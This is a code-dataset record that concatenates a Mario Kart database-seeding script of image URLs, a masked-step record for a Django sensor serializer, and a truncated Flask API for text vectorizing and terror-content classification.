'https://static.wikia.nocookie.net/yoshi/images/a/a4/Orange-yoshi-yoshi-29007923-415-479.png/revision/latest?cb=20201026191941&path-prefix=fr',\n 'https://static.wikia.nocookie.net/mario/images/e/e4/SMRToad.png/revision/latest?cb=20161123170829&path-prefix=fr',\n 'https://static.wikia.nocookie.net/smashbros/images/e/ed/Art_Koopa_NSMB.png/revision/latest?cb=20131223214127&path-prefix=fr',\n 'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/d585815f-9fc0-440f-9949-a4a9c06bb713/db7whvu-94fc7f0d-1dea-47aa-922d-428a26ed8480.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcL2Q1ODU4MTVmLTlmYzAtNDQwZi05OTQ5LWE0YTljMDZiYjcxM1wvZGI3d2h2dS05NGZjN2YwZC0xZGVhLTQ3YWEtOTIyZC00MjhhMjZlZDg0ODAucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.iNMsbFuXa43xVer7q_c2UB65P2wAVONONt-wrMHozjo',\n 'https://i.pinimg.com/originals/58/69/c3/5869c3396ea69ca97c76f0b725099aa9.png',\n 'https://static.wikia.nocookie.net/supermarioexploration/images/8/8e/18B83E32-0819-4994-A3F8-E90CC35AB8AC.png/revision/latest/scale-to-width-down/872?cb=20180607214102',\n 'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dw0-1d608b14-5aba-43f7-b4a8-e855207824c1.png/v1/fill/w_600,h_815,strp/super_mario__green_shy_guy_2d_by_joshuat1306_dcz4dw0-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHcwLTFkNjA4YjE0LTVhYmEtNDNmNy1iNGE4LWU4NTUyMDc4MjRjMS5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.RxuED4zTRqJT-3TAQ8iHGS6zpoDw4O4DIKFQ8cKWpSM',\n 'https://static.miraheze.org/drmarioworldwiki/thumb/9/9a/Cha_sub_shyguyYellow.png/144px-Cha_sub_shyguyYellow.png',\n 'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz564x-7c505016-32d8-4268-b44e-358edcb1b10d.png/v1/fill/w_600,h_815,strp/super_mario__white_shy_guy_2d_by_joshuat1306_dcz564x-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o1NjR4LTdjNTA1MDE2LTMyZDgtNDI2OC1iNDRlLTM1OGVkY2IxYjEwZC5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.gLfujNRPJ5nNiOq-siQUD6ifo28x0oQHEB4PrpNHqFk',\n 'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/ed991cf4-7c8c-4530-b6ba-a3abf3ab2eae/dcz4dqq-95483c93-ee74-4ca0-a820-3287359457a3.png/v1/fill/w_600,h_815,strp/super_mario__blue_shy_guy_2d_by_joshuat1306_dcz4dqq-fullview.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7ImhlaWdodCI6Ijw9ODE1IiwicGF0aCI6IlwvZlwvZWQ5OTFjZjQtN2M4Yy00NTMwLWI2YmEtYTNhYmYzYWIyZWFlXC9kY3o0ZHFxLTk1NDgzYzkzLWVlNzQtNGNhMC1hODIwLTMyODczNTk0NTdhMy5wbmciLCJ3aWR0aCI6Ijw9NjAwIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmltYWdlLm9wZXJhdGlvbnMiXX0.w1w6wZOiQ0oxfwNTiiuFy2Ph6yO6mN99-U_HYKZdZyQ',\n 'https://static.wikia.nocookie.net/paper-shin-aka-keroro-gunsou/images/f/f0/Pink_Shy_Guy_dance.png/revision/latest/scale-to-width-down/250?cb=20210525165708',\n 'https://static.wikia.nocookie.net/fantendo/images/f/ff/ShyGuyn_s._Png/revision/latest/scale-to-width-down/250?cb=20121222235649',\n 'https://static.wikia.nocookie.net/fantendo/images/e/eb/Cloudless_Lakitu.png/revision/latest/scale-to-width-down/250?cb=20120809192910',\n 'https://static.wikia.nocookie.net/mario/images/b/b2/ToadetteMP10.png/revision/latest?cb=20190609122040&path-prefix=fr',\n 'https://static.wikia.nocookie.net/mario/images/a/a1/Boo_CTTT.png/revision/latest?cb=20210504081014',\n 'https://static.wikia.nocookie.net/videogames-fanon/images/d/d9/BabySit.png/revision/latest?cb=20120930205222',\n 'https://i.pinimg.com/originals/c8/4d/1f/c84d1f11741ee80b7bbda79a449917ab.png',\n 'https://www.pngkit.com/png/full/436-4365611_download-zip-archive-baby-peach-mario-bros.png',\n 'https://static.wikia.nocookie.net/fantendo/images/b/be/Baby_Daisy.png/revision/latest?cb=20210119015117',\n 'https://mario.wiki.gallery/images/3/33/MKT_Artwork_BabyRosalina.png',\n 'https://static.wikia.nocookie.net/mario/images/7/7e/Metal_Mario_Artwork_2_-_Mario_Kart_7.png/revision/latest?cb=20120513171323',\n 'https://static.wikia.nocookie.net/mario/images/1/10/MGWT_Gold_Mario.png/revision/latest?cb=20190317040405',\n 'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/0e738c17-7f3c-422e-8225-f8c782b08626/deg7wos-27ff3182-82ba-43ab-b5c0-f05cbec329f2.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcLzBlNzM4YzE3LTdmM2MtNDIyZS04MjI1LWY4Yzc4MmIwODYyNlwvZGVnN3dvcy0yN2ZmMzE4Mi04MmJhLTQzYWItYjVjMC1mMDVjYmVjMzI5ZjIucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.bK3J5_NJrKn-JHsqIxEUCjBiXqM4dMnBho-b2lJ6sK8',\n 'https://www.smashbros.com/assets_v2/img/fighter/wario/main2.png',\n 'https://static.wikia.nocookie.net/wario/images/8/8a/Waluigi%28SMP%290.png/revision/latest?cb=20180929091141',\n 'https://static.wikia.nocookie.net/heroes-fr/images/5/5c/Donkey_Kong.png/revision/latest?cb=20201122110342&path-prefix=fr',\n 'https://static.wikia.nocookie.net/epicpixelbattles/images/0/0b/Bowser-png-clipart-removebg-preview.png/revision/latest?cb=20201013093525',\n 'https://static.wikia.nocookie.net/mario/images/1/12/MPSRSkelerex.png/revision/latest/scale-to-width-down/2000?cb=20161015183419&path-prefix=fr',\n 'https://static.wikia.nocookie.net/mario/images/0/07/Art_Bowser_Jr_SPM.png/revision/latest?cb=20181112222531&path-prefix=fr',\n 'https://mario.wiki.gallery/images/thumb/9/9d/Dry_Bowser_Artwork.png/250px-Dry_Bowser_Artwork.png',\n 'https://www.pngkey.com/png/full/563-5634904_super-mario-odyssey-lemmy-mario-kart-8-deluxe.png',\n 'https://static.wikia.nocookie.net/mariokart/images/4/42/LarryKoopa.png/revision/latest?cb=20140313170129',\n 'https://mario.wiki.gallery/images/thumb/9/95/NSMBW_Wendy_Artwork.png/1200px-NSMBW_Wendy_Artwork.png',\n 'https://static.wikia.nocookie.net/mario-fr/images/f/f6/1-1571859148.png/revision/latest?cb=20191023193229&path-prefix=fr',\n 'https://static.wikia.nocookie.net/mario/images/4/4c/Iggy_NSMBU.png/revision/latest?cb=20171208215237&path-prefix=fr',\n 'https://static.wikia.nocookie.net/mario-fr/images/f/fb/2.png/revision/latest?cb=20191023191713&path-prefix=fr',\n 'https://static.wikia.nocookie.net/fantendo/images/4/4f/Morton_Koopa_Jr_3D.png/revision/latest?cb=20110403192112',\n 'https://static.wikia.nocookie.net/mario/images/2/2e/Inkling_SSBU.png/revision/latest?cb=20200216081405',\n 'https://i.pinimg.com/originals/7c/ce/f8/7ccef872fcee2e11945c6799ce2985cc.png',\n 'https://www.seekpng.com/png/full/7-73001_link-zelda-png-super-smash-bros-for-wii.png',\n 'https://static.wikia.nocookie.net/versus-compendium/images/0/00/Link_BotW.png/revision/latest?cb=20181128185543',\n 'https://static.wikia.nocookie.net/nintendo/images/1/1d/Villager-Boy-1.png/revision/latest?cb=20150419125930&path-prefix=en',\n 'https://i.pinimg.com/originals/bb/ca/f7/bbcaf749d9dc2d1b1259e8fe5cb49769.png',\n 'https://static.wikia.nocookie.net/nintendo-univers/images/a/a9/Marie_ACAF_3.png/revision/latest?cb=20161221163100&path-prefix=fr',\n]\n\ncar_names = [\n 'Standard Kart',\n 'Pipe Frame',\n 'Mach 8',\n 'Steel Driver',\n 'Cat Cruiser',\n 'Circuit Special',\n 'Tri-Speeder',\n 'Badwagon',\n 'Prancer',\n 'Biddybuggy',\n 'Landship',\n 'Sneeker',\n 'Sports Coupe',\n 'Gold Standard',\n 'GLA',\n 'W 25 Silver Arrow',\n '300 SL Roadster',\n 'Blue Falcon',\n 'Tanooki Kart',\n 'B Dasher',\n 'Streetle',\n 'P-Wing',\n 'Koopa Clown',\n 'Standard Bike',\n 'Comet',\n 'Sport Bike',\n 'The Duke',\n 'Flame Rider',\n 'Varmint',\n 'Mr. Scooty',\n 'Jet Bike',\n 'Yoshi Bike',\n 'Master Cycle',\n 'Master Cycle Zero',\n 'City Tripper',\n 'Standard ATV',\n 'Wild Wiggler',\n 'Teddy Buggy',\n 'Bone Rattler',\n 'Splat Buggy',\n 'Inkstriker',\n]\n\ncar_urls = [\n 'https://static.wikia.nocookie.net/mariokart/images/0/05/StandardKartBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20140715154926',\n 'https://static.wikia.nocookie.net/mariokart/images/d/d1/PipeFrameBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122932',\n 'https://static.wikia.nocookie.net/mariokart/images/d/df/Mach8BodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122956',\n 'https://static.wikia.nocookie.net/mariokart/images/9/94/Steel_Driver.png/revision/latest/scale-to-width-down/100?cb=20200925190921',\n 'https://static.wikia.nocookie.net/mariokart/images/f/f4/CatCruiserBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123132',\n 'https://static.wikia.nocookie.net/mariokart/images/6/6c/CircuitSpecialBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123237',\n 'https://static.wikia.nocookie.net/mariokart/images/5/56/TrispeederBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123217',\n 'https://static.wikia.nocookie.net/mariokart/images/c/c2/BadwagonBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123350',\n 'https://static.wikia.nocookie.net/mariokart/images/f/ff/PrancerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123333',\n 'https://static.wikia.nocookie.net/mariokart/images/4/45/BiddybuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123322',\n 'https://static.wikia.nocookie.net/mariokart/images/6/6d/LandshipBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123656',\n 'https://static.wikia.nocookie.net/mariokart/images/4/47/SneakerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123617',\n 'https://static.wikia.nocookie.net/mariokart/images/f/f8/SportsCoupeMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123625',\n 'https://static.wikia.nocookie.net/mariokart/images/3/31/MK8Gold_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102123637',\n 'https://static.wikia.nocookie.net/mariokart/images/c/c2/GLA-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140333',\n 'https://static.wikia.nocookie.net/mariokart/images/2/25/W25SilverArrow-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332',\n 'https://static.wikia.nocookie.net/mariokart/images/1/17/300SLRoadster-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332',\n 'https://static.wikia.nocookie.net/mariokart/images/e/ed/MK8_BlueFalcon.png/revision/latest/scale-to-width-down/100?cb=20150331235059',\n 'https://static.wikia.nocookie.net/mariokart/images/d/d7/MK8_TanookiBuggy.png/revision/latest/scale-to-width-down/100?cb=20150331235545',\n 'https://static.wikia.nocookie.net/mariokart/images/3/32/MK8_BDasher.png/revision/latest/scale-to-width-down/100?cb=20150401000836',\n 'https://static.wikia.nocookie.net/mariokart/images/c/cf/MK8Streetle.png/revision/latest/scale-to-width-down/100?cb=20150426174005',\n 'https://static.wikia.nocookie.net/mariokart/images/c/cd/MK8PWing.png/revision/latest/scale-to-width-down/100?cb=20150426174107',\n 'https://static.wikia.nocookie.net/mariokart/images/7/70/MK8DX_Koopa_Clown.png/revision/latest/scale-to-width-down/100?cb=20170704061052',\n 'https://static.wikia.nocookie.net/mariokart/images/8/84/StandardBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123849',\n 'https://static.wikia.nocookie.net/mariokart/images/0/0e/CometBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124024',\n 'https://static.wikia.nocookie.net/mariokart/images/f/fe/SportBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123857',\n 'https://static.wikia.nocookie.net/mariokart/images/8/8a/TheDukeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925174819',\n 'https://static.wikia.nocookie.net/mariokart/images/3/31/FlameRiderBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123942',\n 'https://static.wikia.nocookie.net/mariokart/images/d/d0/VarmintBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123951',\n 'https://static.wikia.nocookie.net/mariokart/images/1/18/MrScootyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123925',\n 'https://static.wikia.nocookie.net/mariokart/images/1/12/JetBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123928',\n 'https://static.wikia.nocookie.net/mariokart/images/6/62/YoshiBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925193256',\n 'https://static.wikia.nocookie.net/mariokart/images/5/52/MK8_MasterCycle.png/revision/latest/scale-to-width-down/100?cb=20150331231734',\n 'https://static.wikia.nocookie.net/mariokart/images/3/3e/150px-MK8D_Master_Cycle_Zero.png/revision/latest/scale-to-width-down/111?cb=20200726154936',\n 'https://static.wikia.nocookie.net/mariokart/images/9/90/MK8CityTripper.png/revision/latest/scale-to-width-down/100?cb=20150426175601',\n 'https://static.wikia.nocookie.net/mariokart/images/2/23/StandardATVBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124111',\n 'https://static.wikia.nocookie.net/mariokart/images/a/aa/WildWigglerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925175122',\n 'https://static.wikia.nocookie.net/mariokart/images/f/fa/TeddyBuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124120',\n 'https://static.wikia.nocookie.net/mariokart/images/0/0a/MK8BoneRattler.png/revision/latest/scale-to-width-down/100?cb=20150426180108',\n 'https://static.wikia.nocookie.net/mariokart/images/6/63/MK8DX_Splat_Buggy.png/revision/latest/scale-to-width-down/100?cb=20170706064814',\n 'https://static.wikia.nocookie.net/mariokart/images/e/eb/MK8DX_Inkstriker.png/revision/latest/scale-to-width-down/100?cb=20170706065507',\n]\n\ntire_names = [\n 'Standard',\n 'Monster',\n 'Roller',\n 'Slim',\n 'Slick',\n 'Metal',\n 'Button',\n 'Off-Road',\n 'Sponge',\n 'Wood',\n 'Cushion',\n 'Blue Standard',\n 'Hot Monster',\n 'Azure Roller',\n 'Crimson Slim',\n 'Cyber Slick',\n 'Retro Off-Road',\n 'Gold Tires',\n 'GLA Tires',\n 'Triforce Tires',\n 'Ancient Tyres',\n 'Leaf Tires',\n]\n\ntire_urls = [\n 'https://static.wikia.nocookie.net/mariokart/images/a/a8/StandardTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125545',\n 'https://static.wikia.nocookie.net/mariokart/images/2/29/MonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125541',\n 'https://static.wikia.nocookie.net/mariokart/images/7/76/RollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125539',\n 'https://static.wikia.nocookie.net/mariokart/images/f/f8/SlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125536',\n 'https://static.wikia.nocookie.net/mariokart/images/d/dd/SlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125542',\n 'https://static.wikia.nocookie.net/mariokart/images/9/96/MetalTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124533',\n 'https://static.wikia.nocookie.net/mariokart/images/0/07/ButtonTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124541',\n 'https://static.wikia.nocookie.net/mariokart/images/2/25/Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102124559',\n 'https://static.wikia.nocookie.net/mariokart/images/4/4c/SpongeTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124549',\n 'https://static.wikia.nocookie.net/mariokart/images/0/03/WoodTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124724',\n 'https://static.wikia.nocookie.net/mariokart/images/9/92/CushionTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124817',\n 'https://static.wikia.nocookie.net/mariokart/images/d/db/Blue_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102124836',\n 'https://static.wikia.nocookie.net/mariokart/images/d/d1/HotMonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124834',\n 'https://static.wikia.nocookie.net/mariokart/images/f/fe/AzureRollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20200726154338',\n 'https://static.wikia.nocookie.net/mariokart/images/7/71/CrimsonSlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125627',\n 'https://static.wikia.nocookie.net/mariokart/images/2/29/CyberSlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125626',\n 'https://static.wikia.nocookie.net/mariokart/images/4/48/Retro_Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102125629',\n 'https://static.wikia.nocookie.net/mariokart/images/5/52/Gold_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20141102125630',\n 'https://static.wikia.nocookie.net/mariokart/images/b/ba/GLATires-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180539',\n 'https://static.wikia.nocookie.net/mariokart/images/0/09/MK8_TriforceTires.png/revision/latest/scale-to-width-down/100?cb=20150331233357',\n 'https://static.wikia.nocookie.net/mariokart/images/d/d5/MK8D_Ancient_Tires.png/revision/latest/scale-to-width-down/100?cb=20200726154442',\n 'https://static.wikia.nocookie.net/mariokart/images/f/f9/Leaf_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180810',\n]\n\nglider_names = [\n 'Super Glider',\n 'Cloud Glider',\n 'Wario Wing',\n 'Waddle Wing',\n 'Peach Parasol',\n 'Parachute',\n 'Parafoil',\n 'Flower Glider',\n 'Bowser Kite',\n 'Plane Glider',\n 'MKTV Parafoil',\n 'Gold Glider',\n 'Hylian Kite',\n 'Paraglider',\n 'Paper Glider',\n]\n\nglider_urls = [\n 'https://static.wikia.nocookie.net/mariokart/images/a/a8/SuperGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125815',\n 'https://static.wikia.nocookie.net/mariokart/images/8/84/Cloud_Glider.png/revision/latest/scale-to-width-down/100?cb=20141102125838',\n 'https://static.wikia.nocookie.net/mariokart/images/a/ae/WarioWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125853',\n 'https://static.wikia.nocookie.net/mariokart/images/e/ef/WaddleWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125901',\n 'https://static.wikia.nocookie.net/mariokart/images/6/6e/PeachParasolGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125940',\n 'https://static.wikia.nocookie.net/mariokart/images/d/dd/ParachuteGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125823',\n 'https://static.wikia.nocookie.net/mariokart/images/c/c4/ParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125830',\n 'https://static.wikia.nocookie.net/mariokart/images/b/b3/FlowerGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125846',\n 'https://static.wikia.nocookie.net/mariokart/images/f/f7/BowserKiteMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125909',\n 'https://static.wikia.nocookie.net/mariokart/images/c/ca/PlaneGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125930',\n 'https://static.wikia.nocookie.net/mariokart/images/9/96/MKTVParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125947',\n 'https://static.wikia.nocookie.net/mariokart/images/1/18/GoldGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125956',\n 'https://static.wikia.nocookie.net/mariokart/images/6/62/MK8_HylianKite.png/revision/latest/scale-to-width-down/100?cb=20150331232731',\n 'https://static.wikia.nocookie.net/mariokart/images/3/39/MK8D_Paraglider.png/revision/latest/scale-to-width-down/117?cb=20200726155246',\n 'https://static.wikia.nocookie.net/mariokart/images/0/0e/PaperGliderIcon-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426181313',\n]\n\n\nx=0\ny=0\nfor char in char_names:\n index=x-y+1\n name = char_names[x]\n if \"Yoshi (\" in name or \"Shyguy (\" in name or \"(G)\" in name:\n y+=1\n index=None\n new_char = Character(name=char_names[x],image_url=char_urls[x],index=index)\n new_char.save()\n x+=1\n\nx=0\nfor tire in tire_names:\n index=x+1\n new_tire = Tire(name=tire_names[x],image_url=tire_urls[x],index=index)\n new_tire.save()\n x+=1\nx=0\nfor car in car_names:\n index=x+1\n new_car = Vehicle(name=car_names[x],image_url=car_urls[x],index=index)\n new_car.save()\n x+=1\nx=0\nfor glider in glider_names:\n index=x+1\n new_glider = Glider(name=glider_names[x],image_url=glider_urls[x],index=index)\n new_glider.save()\n x+=1\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from rest_framework import serializers
from .models import SensorValue
class SensorValueSerializer(serializers.ModelSerializer):
timestamp = serializers.DateTimeField(required=False)
class Meta:
model = SensorValue
fields = ("id", "timestamp", "sensor_type", "value")
|
normal
|
{
"blob_id": "39312ec60c9ef1c9c95cf4206b6d0bbdb0aedf94",
"index": 9042,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass SensorValueSerializer(serializers.ModelSerializer):\n <mask token>\n\n\n class Meta:\n model = SensorValue\n fields = 'id', 'timestamp', 'sensor_type', 'value'\n",
"step-3": "<mask token>\n\n\nclass SensorValueSerializer(serializers.ModelSerializer):\n timestamp = serializers.DateTimeField(required=False)\n\n\n class Meta:\n model = SensorValue\n fields = 'id', 'timestamp', 'sensor_type', 'value'\n",
"step-4": "from rest_framework import serializers\nfrom .models import SensorValue\n\n\nclass SensorValueSerializer(serializers.ModelSerializer):\n timestamp = serializers.DateTimeField(required=False)\n\n\n class Meta:\n model = SensorValue\n fields = 'id', 'timestamp', 'sensor_type', 'value'\n",
"step-5": "from rest_framework import serializers\nfrom .models import SensorValue\n\n\nclass SensorValueSerializer(serializers.ModelSerializer):\n timestamp = serializers.DateTimeField(required=False)\n\n class Meta:\n model = SensorValue\n fields = (\"id\", \"timestamp\", \"sensor_type\", \"value\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# POST API for Red Alert project - NLP and Metalearning components
# Insikt Intelligence S.L. 2019
import pandas as pd
import pickle
from flask import Flask, render_template, request, jsonify
from utilities import load_data, detect_language
from preprocessing import preprocess, Tagger, remove_stopwords
import json
from gensim.models import KeyedVectors
from Embeddings import Embeddings, to_vector_single, to_vector_single_nonzeros
import numpy as np
import os
from analysis import analyze
from probability_terror import probability_terror
from new_terms_no_lang import new_terms
from classifier import classifier
from claslisting import claslisting
from audit import audit
app = Flask(__name__)
emb_dict = {"en": "embedding-EN", "ar": "embedding-AR", "es": "embedding-ES", "ro": "embedding-RO","fr": "embedding-FR"}
@app.route('/vectorize',methods=['POST'])
def make_vectorize():
try:
#Load the data
data = request.get_json()
except Exception as e:
raise e
if data == {}:
return(bad_request())
else:
#Get the text and the language
try:
lang = data['lang']
except:
try:
lang=detect_language(data['text'])
print(lang)
except:
responses=jsonify("Error in vectorize: language field is missing")
return responses
try:
text = data['text']
except:
responses=jsonify("Error in vectorize: text is missing")
return responses
if lang not in ['en','es','ar','ro','fr']:
responses=jsonify("Language not available. Language must be in ['en','es','ar','ro','fr']")
return responses
#Preprocess the text
print("Vectorize...")
embeddings = Embeddings(emb_dict[lang])
processed_text = preprocess(text)
no_stpw_text = remove_stopwords(processed_text, lang)
vectorized_tokens=to_vector_single_nonzeros(no_stpw_text, embeddings,len(no_stpw_text))
if len(vectorized_tokens) > 0:
vectorized_text = np.mean(vectorized_tokens, axis=0)
else:
vectorized_text =np.zeros((300,)*1)
print(vectorized_text)
#Send the response codes
responses = jsonify(vector=vectorized_text.tolist())
responses.status_code = 200
return responses
@app.route('/probability',methods=['POST'])
def make_probability():
try:
#Load the data
data = request.get_json()
except Exception as e:
raise e
if data == {}:
return(bad_request())
else:
#Get the text,language and classifier
try:
lang = data['lang']
except:
try:
lang=detect_language(data['text'])
print(lang)
except:
responses=jsonify("Error in vectorize: language field is missing")
return responses
try:
text = data['text']
except:
responses=jsonify("Error in probability: text is missing")
return responses
try:
cls = data['classifier']
except:
responses=jsonify("Error in probability: classifier is missing")
return responses
if lang not in ['en','es','ar','ro','fr']:
responses=jsonify("Language not available. Language must be in ['en','es','ar','ro','fr']")
return responses
#Preprocess the text
print("Computing probability of having content related to "+cls)
probability = probability_terror(text,lang,cls)
#Send the response codes
responses = jsonify(probability=probability)
responses.status_code = 200
return responses
@app.route('/analyze',methods=['POST'])
def make_analyze():
try:
#Load the data
data = request.get_json()
except Exception as e:
raise e
if data == {}:
return(bad_request())
else:
#Get the text and the language
try:
lang = data['lang']
except:
try:
lang=detect_language(data['text'])
print(lang)
except:
responses=jsonify("Error in vectorize: language field is missing")
return responses
try:
text = data['text'] # we assume text is tokenized
except:
responses=jsonify("Error in analyze: text is missing")
return responses
if lang not in ['en','es','ar','ro','fr']:
responses=jsonify( message = "Language not available. Language must be in ['en','es','ar','ro','fr']")
return responses
filename = os.path.join(os.path.dirname(__file__), 'models-registry.json')
registry = load_data(filename)
analysis = analyze(text, lang, registry)
#print(analysis[0])
#Send the response codes
responses = jsonify(concepts=analysis[0],key_ideas=analysis[1],topics=analysis[2])
responses.status_code = 200
return responses
@app.route('/terms',methods=['POST'])
def make_terms():
try:
#Load the data
data = request.get_json()
except Exception as e:
raise e
if data == {}:
return(bad_request())
else:
texts = data['dataset'] # we assume text is tokenized
#Preprocess the text
print("Suggesting new terms for search...")
terms=new_terms(texts)
#print(terms)
#Send the response codes
responses = jsonify(message="Suggested new terms for search: ",terms= list(terms))
responses.status_code = 200
return responses
@app.route('/sento',methods=['POST'])
def make_sento():
try:
#Load the data
data = request.get_json()
except Exception as e:
raise e
if data == {}:
return(bad_request())
else:
#Get the text, language and classifier
try:
lang = data['lang']
except:
try:
lang=detect_language(data['text'])
print(lang)
except:
responses=jsonify("Error in vectorize: language field is missing")
return responses
try:
text = data['text']
except:
responses=jsonify("Error in sento: text is missing")
return responses
try:
cls = data['classifier']
except:
responses=jsonify("Error in sento: classifier is missing")
return responses
if lang not in ['en','es','ar','ro','fr']:
responses=jsonify("Language not available. Language must be in ['en','es','ar','ro','fr']")
return responses
#Preprocess the text
print("Sento analysis")
# Probability
probability = probability_terror(text,lang,cls)
print(probability)
# Analyze
filename = os.path.join(os.path.dirname(__file__), 'models-registry.json')
registry = load_data(filename)
analysis = analyze(text, lang, registry)
